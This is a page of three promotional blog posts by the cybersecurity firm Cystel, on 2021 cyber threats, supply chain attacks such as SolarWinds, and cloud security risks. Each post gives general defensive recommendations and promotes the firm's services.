Should We Prepare for a New Era of Cyber Pandemic in 2021

/in

COVID-19 has led to the prolific use of virtual technologies to support remote work. This is gradually paving the way for a new pandemic- a sharp increase in organisations being held hostage by cyber criminals, data theft, privacy breaches and disruption to supply chain across the globe.

Organisations, already under pressure from COVID-19 are being targeted by a variety of scams and threats and are increasingly giving in to these threats. Fatface, a UK fashion retailer has paid out $2 million to a ransomware gang that breached their systems in January 2021.

More recently, in March 2021, Acer, a Taiwanese electronic company, were attacked by a group called REvil , who demanded a ransom of $50 million, one of the largest ransomware demands in recent history. A wide range of reports by cybersecurity scholars (Fireeye 2021, Hiscox 2020, Vasek,2019) have established that cyberattacks are rapidly evolving and growing in both frequency and severity, with costs reaching up to $6 trillion in 2021 and set to rise further. These reports, amongst other security news outlets, have discussed trends that will dominate the cybersecurity landscape in 2021. Some of these are:

1. Evolution of attack techniques and IoT threats

Common attack techniques such as phishing, ransom ware, botnets, trojans and phreaking will remain prominent. However they will likely be automated using artificial intelligence and tailored to specific companies as targets, having carefully mined data on personnel, social networks, and social media. The lack of time to prepare staff for training in the use of remote technology applications and use of IoT in homes is set to exacerbate the problem.

2. The cloud footprint

95% of companies have a cloud presence, if only for payroll or HR functions. Cloud attacks are likely to grow and be executed through hacking-vulnerable cloud applications, stealing credentials via phishing, exploitation of any misconfigurations and through the supply chain, such as cloud vendors.

3. Nation State Attacks

The attack on Solarwinds in 2020 has demonstrated that threat actors can take the form of nation states and can sponsor regional and global attacks. Spear phishing, a common tool, will continue to dominate in 2021. However there is an increased focus on intrusion techniques such as exploitation of web facing applications, password spraying and increased use of third-party intrusion vendors.

4. Fileless malware

Fileless malware depends on tools that are a part of the workflow for most enterprises, specifically tools that are pre-installed on every Windows machine and are vital for all operations. Attackers could use a range of windows processes such as PowerShell, Windows Management Instrumentation (WMI) and .NET. We are likely to see attackers continuously innovate and share techniques as they develop such malware as a service model in 2021.

2021 brings new challenges on the health and cyber front. As cyber criminals are getting organised as ‘companies’ and improving both technologies and attack strategies, we must, as a matter of urgency, look at our own cybersecurity and data protection. Surface level products and software are not enough to combat the threats that 2021 brings. Advanced solutions are needed to monitor risks and assess vulnerabilities and endpoint solutions to thwart threats and build cyber resilience.

The World Economic Forum lists cybersecurity failures among the main global risks in 2021.

Can you shield against a cyber pandemic?

A risk management approach is vital to digital security. A significant part of securing the cyber landscape is knowing how to best protect the most significant assets and effectively defend against security incidents and breaches. As with a biological pandemic some key steps are:

  • Reduce the rate of infection. Check your systems to protect critical assets and detect and remove threats in real-time.
  • Prevent an infection. Develop an SOC for real time prevention and access to continuous security intelligence.
  • Improve cyber hygiene. Practice cyber hygiene by keeping up-to-date with security threats and ensure compliance with regulations and latest standards.

At Cystel, we recommended asking the following key questions to test your state of preparedness.

  • What is my current security protocol?
  • What vulnerabilities or gaps do I have in my remote infrastructure?
  • Do I understand security effectiveness as a business metric?
  • What is my risk management approach to mitigating threats of IoT?
  • Is my organisation’s security training state-of-the-art?

As cybersecurity researchers at Cystel, we believe cyber readiness needs to be a top priority for every connected individual . There is no one size that fits all and there are a variety of solutions, services, and protocols to evaluate to help meet security challenges. Speak to us about your cyber challenges for 2021 and stay safe during the next wave of cyber attacks.

Are You Vulnerable to Supply Chain Attacks?

/in

A supply chain attack, sometimes referred to as a “value-chain” or “third-party attack”, occurs when someone penetrates your systems via an external partner or supplier who already has access to your systems, information and data. Due to the number of suppliers that companies are working with, as well as the recent increase in remote working across supply chains, the attack surface has increased drastically.

The Guardian reported on a recent incident of supply chain attacks using software from SolarWinds – a networking tools developer. As part of this Russia attributed attack, approximately 18 000 customers were affected, in which numerous government and company networks were penetrated. The attack impacted as many as 250 organizations. The hackers managed to penetrate multiple supply chain layers and the outsourcing of different software solutions seemed to be one of the main drivers that resulted in the attack, culminating in an estimated cost of $90 million for cyber insurance firms (according to Bitsight).

It is important to be aware of where supply chain attacks can come from. Companies may encounter five kinds of cybersecurity risks in supply chains, namely: physical threats, breakdowns, indirect attacks, direct attacks and insider threats.

Physical threats are associated with items such as switches, servers, routers and other information communication and technological devices. Furthermore, environmental disasters such as flooding, heavy snow and tornados, deliberate damage to a firm’s infrastructure, theft and malfunctioning of infrastructural components, as well as terrorist attacks, all fall under this category of physical threats.

In terms of breakdowns, risks such as outdated firewalls and delayed cybersecurity updates can also attract the attention of hackers. Although these risks are more predictable compared to some of the risks mentioned above, the effects can also be dire.

Deliberate attacks can be broken down into direct and indirect attacks. Direct attacks involve getting hacked, denied services or your password being sniffed, all for the purpose of manipulating or threatening you for money (consider industrial espionage or an individual compromising your firm’s intellectual property). Indirect attacks are like bait used for fishing. If employees fall for the bait, hackers can access systems for which the bait was meant for. Trojans, worms, viruses, counterfeit products, as well as compromised hardware and software come to mind. Malicious codes and spoofing attacks also feature in this category. In particular, phishing attacks (someone gaining access to sensitive information, whilst your employee thinks they can trust the software or device they are using) have increased in recent times.

Finally, employees posing a cybersecurity threat are referred to as an insider threat. From this perspective, careless employees who use simplistic passwords, write down their passwords or who unintentionally disclose sensitive information are associated with this risk. These risks can also be fuelled by intent. For example: opportunistic misuse of information or taking revenge. Whether these risks occur based on negligence or premeditation, the human factor is key here.

Following the mantra, “smart executives learn from their mistakes, wise executives learn from the mistakes of others”, below are some ways you can take action:

Key strategies to protecting against supply chain attacks

  1. Develop an approach to identify, prioritize, and mitigate cybersecurity supply chain attacks and disruptions.
  2.  Publish emergency response and crisis management guidelines.
  3.  Create a risk-mitigation approach, which supports your global sourcing strategy.
  4.  Collaborate with suppliers to support them in developing business continuity programmes which ensure the continuation of supply.
  5.  Improve logistics continuity plans with global logistics partners.

Important Outcomes for ensuring effective cybersecurity measures

  • Emergency response and crisis management guidelines to decrease the effects of supply chain attacks and disruptions
  • A cybersecurity preparedness plan
  • A supply continuity plan for suppliers of critical parts
  • A warehousing and inventory positioning strategy, which buffers supply disruptions
  • A risk exposure database including a traffic light system, which provides early warning indicators of supply disruption

In order to identify the threats highlighted in any of the five threat categories mentioned above and to develop appropriate strategies in your supply chain, our risk and crisis management approach can help you to build your cybersecurity defensive and offensive capabilities, reduce your exposure, minimise your vulnerabilities and strengthen your defences, thereby decreasing the chances of a potential breach.

In addition, our threat management and incident response capabilities will enable you to take action quickly and forcefully against unexpected cybersecurity threats and increase your ability to respond and recover timely.

If the situation in your supply chain does not require urgent action at this moment, we also offer cybersecurity training programs, such as our cybersecurity in a day for executives program as well as our cyber security training and awareness program for your workforce, which is delivered inpartnership with the British Computer Society (BCS).

Cloud Technologies: Easy Solution or Security Nightmare?

/in

A Gartner study from October 2019 forecasted that the public cloud technologies services market would reach $266.4 billion in 2020. 17% growth seems excessive, but it pales against the 50% overall increase in cloud utilization across the enterprise that McAfee reported in 2020, partially motivated by COVID-19 related mandates.
Great time to market, apparent simplicity as well as lower technology, business and financial barriers, made the cloud the preferred real-estate among individuals and enterprise alike. Cloud technology is a game changer and a life saver, but it can also be a cybersecurity nightmare.

As organizations extended their technology landscape across multiple physical and trust boundaries, what used to be a solid perimeter to protect is now a series of highly dynamic “micro-borders” or just no clearly delimited border at all. This change in the technology landscape also unveils a problem with current cybersecurity approaches and paradigms that were originally designed to protect organizations, starting at their borders.

When organizations extend their networks to the cloud, they are trading security for time to market, productivity, efficiency, usability, and accessibility. A price that businesses will pay gladly. Many times, these implementations are a product of firms’ strategies or planned processes, but often cloud technology adoption responds to emergencies. When the latter happens, the outcome is an implementation plagued with vulnerabilities.

We know now that architecting and designing solutions in or for cloud technologies require a different set of skills. The selection, deployment, configuration and integration of cloud artifacts, the leverage of trusted domains, the management of certificates, the whitelisting of addresses, the practice of allowing apps to bypass inline defenses, the need for data movement across boundaries and the vulnerabilities intrinsic to browsers open opportunities for vulnerabilities that could be used by malicious actors to gain access to our data.

The attack vectors that corporate cloud users should be aware of include:

  • Data breaches and loss
  • Insider attacks
  • DoS and DDoS attacks
  • Cloud phishing
  • Cloud malware injection
  • Cross-cloud attacks
  • Side channel attacks
  • Credential stuffing attacks.

So how do companies adapt their cybersecurity postures and develop the policies, controls, processes, and technologies to protect their data and achieve regulatory compliance requirements?

Our recommendations to protect your data and your users in the cloud include the following:

  • Implementation of a Zero Trust security approach to control access to your workloads and limit network lateral movement.
  • Use of strong passwords, multi-factor authentication (MFA) and access controls.
  • Adaptive access based on user, app, instance, device, location, data, and destination to selectively grant access.
  • Protect endpoints using endpoint threat management and response solutions.
  • Implement continuous risk security assessments.
  • Secure and manage network traffic.
  • Restrict cloud utilization and manage adoption in a centralized manner.
  • Implement granular data protection controls.
  • Implement cloud data loss prevention.
  • Implement threat hunting.
  • Continuous training and awareness programs.

The adoption of these technologies is quick and simple. Cloud services enable organizations’ processes, improve quality, increase productivity and speed to market, but it also creates vulnerabilities that must be addressed before it is too late. As organizations extend their technology landscape across boundaries, traditional cybersecurity postures may not be able to provide the level of protection needed. Cystel specializes in detecting and remediating cybersecurity vulnerabilities in these enterprise deployments, reducing your risk so you can focus on your core business.